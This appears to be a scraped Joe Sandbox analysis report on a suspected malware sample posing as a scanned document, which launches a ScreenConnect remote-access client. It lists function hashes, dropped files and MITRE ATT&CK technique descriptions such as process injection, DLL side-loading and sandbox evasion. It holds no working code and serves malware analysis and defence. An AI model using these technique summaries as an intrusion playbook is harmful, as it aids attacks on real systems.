Function 00007FFD9BB82257 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9c2396bd640fd2b0643ae542aba1d0a1fb7fcc289d53e7af09ae94a46a8d9e
Instruction ID: f40605e85dce89ee78502e5d9b45243c3fd59dd00b93c33be8e4847db2b61b72
Opcode Fuzzy Hash: ec9c2396bd640fd2b0643ae542aba1d0a1fb7fcc289d53e7af09ae94a46a8d9e
Instruction Fuzzy Hash: 34117F71B0AD094FDB98EF58C464B6977A2FF58314F0541B8C44DCB2E6DA35E9428780

Function 00007FFD9BB822C0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f246753bc8cba63d8039b92f80ba597d032540d1067cd90ac5093cad115905a
Instruction ID: b146e9e69cf4414ba489917d9ef2ee9a71e06717f3a49a308e8a19f640cc6077
Opcode Fuzzy Hash: 6f246753bc8cba63d8039b92f80ba597d032540d1067cd90ac5093cad115905a
Instruction Fuzzy Hash: 0C117C71A0AD494FDB98EF58C464B6977A2FF68314F0541A8C44DCB2E6DA35E9028B80

Function 00007FFD9BB84109 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97f80d9ef3c0675e67402ba72cc47ec0af3fe172bb53513accc7e324d5b0d17
Instruction ID: e51841964a79c6785cc68e117e066e8f20c0ea3df5488b1248ec6d8ddf558477
Opcode Fuzzy Hash: e97f80d9ef3c0675e67402ba72cc47ec0af3fe172bb53513accc7e324d5b0d17
Instruction Fuzzy Hash: BC11A721F0EA4B0AF7BA626944B23756EE1AFA5244F4A80BEC449C61E6DC2C9D818341

Function 00007FFD9BB8426A Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8279a0ed33ece776b989a5be1b1cdd669da0659c91c9cad99b43a3fb397ecbd5
Instruction ID: fd2d56f9faf4503935d96097646a37ac80b2d8b780112cb690f3e5b385d72ceb
Opcode Fuzzy Hash: 8279a0ed33ece776b989a5be1b1cdd669da0659c91c9cad99b43a3fb397ecbd5
Instruction Fuzzy Hash: 37017611A0EC980FDF95567C0829AB03FD1DF6A204B0D00EAD408CF1F3D80CD8498380

Function 00007FFD9BB842B5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1519755670f4f1e397b5592a8585dfb2b18dba1a46c6e22cfaea7dbbd00b8601
Instruction ID: 349ede94ae8bacb00e375449cd65f0896b20e6752c96674037459650135f67a6
Opcode Fuzzy Hash: 1519755670f4f1e397b5592a8585dfb2b18dba1a46c6e22cfaea7dbbd00b8601
Instruction Fuzzy Hash: 4DE09221A1EEA90FD766976C58695617FE0EB6630070A01DBC489CB1F3DC19DD85C381

Function 00007FFD9BB83489 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404e6ad3b8721183551faa4c0053dc9572a1947ba27454a192f5748f5488abad
Instruction ID: 750b4fbdcbe9d74507b8caab7d2a8e65abb363c38eae6c65d359395453db34aa
Opcode Fuzzy Hash: 404e6ad3b8721183551faa4c0053dc9572a1947ba27454a192f5748f5488abad
Instruction Fuzzy Hash: A1F0303540D68C5FCB42DB68D4659E5BF70FE16325B0901CBE059CF062E7219A55CB82

Function 00007FFD9BB835A5 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651aea90582dc1eeb9288ebc3b8be45d0b6743d91f2bea8c96e14f7a4364c76b
Instruction ID: b1651b6a29c8ab215861b41dd51d90024a9d7079da6163b2ba0dec46ad811d7b
Opcode Fuzzy Hash: 651aea90582dc1eeb9288ebc3b8be45d0b6743d91f2bea8c96e14f7a4364c76b
Instruction Fuzzy Hash: 15E0DF20A1EC1D0FDBA5A66CA068AA53790EF2431870601EAD408CB1F6D814CD8583C0

Function 00007FFD9BB80DE0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07190eec911ab1e4795433d9f5c772b1ffe677b9f89517658dd8b84efc2687c7
Instruction ID: b7f76ccf3a0ea6ff9d45e03afa7a4a47c9d342f5e416b296aca3a2a17cbf722b
Opcode Fuzzy Hash: 07190eec911ab1e4795433d9f5c772b1ffe677b9f89517658dd8b84efc2687c7
Instruction Fuzzy Hash: B7E04F3150991C9FCB15EB68E455CEA7764EF15318B054197E00EC70A2DA22A954CBC1

Function 00007FFD9BB84120 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3413e36f6bcc67ec7d87e429a4b96c53a2ff8da3548c24b0d6f49a413158296
Instruction ID: 4e86661fab00f4024d0b43d2eb023e147ee772667763cecd3c2bdd87a8b582c6
Opcode Fuzzy Hash: c3413e36f6bcc67ec7d87e429a4b96c53a2ff8da3548c24b0d6f49a413158296
Instruction Fuzzy Hash: 28E08C25B4EA0B42FB7C32B568A23B5A891AF05309F4A407ED41DC15E9DC6C9E819152

Function 00007FFD9BB87BFA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4576f083b421b730865e9f6af20a6b4708d1318262a2a8e8d88969ab6bd7dadf
Instruction ID: 7804c7b8cd42758bdd64618b717e09cd2264590f0e247709172f4c7e19bcd131
Opcode Fuzzy Hash: 4576f083b421b730865e9f6af20a6b4708d1318262a2a8e8d88969ab6bd7dadf
Instruction Fuzzy Hash: DDD0A743B5AC0D0BE5B4A65D34112F402C3E7D86A4B860073D50DC72EADC19ADC20780

Function 00007FFD9BB8235F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
Instruction ID: 7666abcd716fb83f3a66d63f4f60fb5aa1a6417093072836d240c84cfbbbafd2
Opcode Fuzzy Hash: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
Instruction Fuzzy Hash: 34C09B10F1B94E46F264EBA584B17BD1153FF8C609F964435D00DC31E6CD3C67016645

Function 00007FFD9BB820A1 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
Instruction ID: 856ab7d1b1e8f3f7197c6920114dfa4e6c603a004ebc61368b519c7b7baec459
Opcode Fuzzy Hash: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
Instruction Fuzzy Hash: 81A00240F0FD1E85E0B5E6D6406177D00425F4DA08F624135D00DC21F6CD2C6B422297

Analysis Process: ScreenConnect.WindowsClient.exePID: 7664, Parent PID: 7476COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	2

Executed Functions

Function 00007FFD9BBB8DBC Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2026239969.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b046db56febb43373c8ed1d2a43c6f7c7a451e6277b4adf896187af28949dc87
Instruction ID: 7cff722a925e499518ce5f7c0f19e42f5f3342258d71204ca5c953a372076a91
Opcode Fuzzy Hash: b046db56febb43373c8ed1d2a43c6f7c7a451e6277b4adf896187af28949dc87
Instruction Fuzzy Hash: DD715831E0E69D4FE771CBA88C256BA7FE0FF56314F0541BAD08CC75E2DA64690A8B41

Function 00007FFD9B8A8014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8142

Memory Dump Source

Source File: 0000000D.00000002.2024153996.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 0c9ac84724606f768ec77f574eb49a04914c1869d51a1910754932b32a74a273
Instruction ID: eb89acd12957c0e7364faf5436171b0fbb49feb3e90022ca7a844afe76d4c63d
Opcode Fuzzy Hash: 0c9ac84724606f768ec77f574eb49a04914c1869d51a1910754932b32a74a273
Instruction Fuzzy Hash: 70413B31D0DB584FDB28AFA8984A5E97BE0EF59310F04417FE449C3192DF78A946CBA1

Function 00007FFD9B8A3AA2 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8142

Memory Dump Source

Source File: 0000000D.00000002.2024153996.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: fb5ae72f5f54e9e658536393f6d5070e434499de52b9c7863d1cddb885256adf
Instruction ID: 15bf649387bca3f4f765936368199400414f4dcb5d086abc185e5f9557ca91e9
Opcode Fuzzy Hash: fb5ae72f5f54e9e658536393f6d5070e434499de52b9c7863d1cddb885256adf
Instruction Fuzzy Hash: 8E21A771918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Scan_doc_09_16_24_1203.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_aedb73e836754362da95bba687cf27318a3fb5be_aa7badcc_0fa6576a-6384-4927-8d48-c234dc77d347\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8DC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB1F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD14.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD7F.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE8A.tmp.txt

Windows Analysis Report
Scan_doc_09_16_24_1203.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre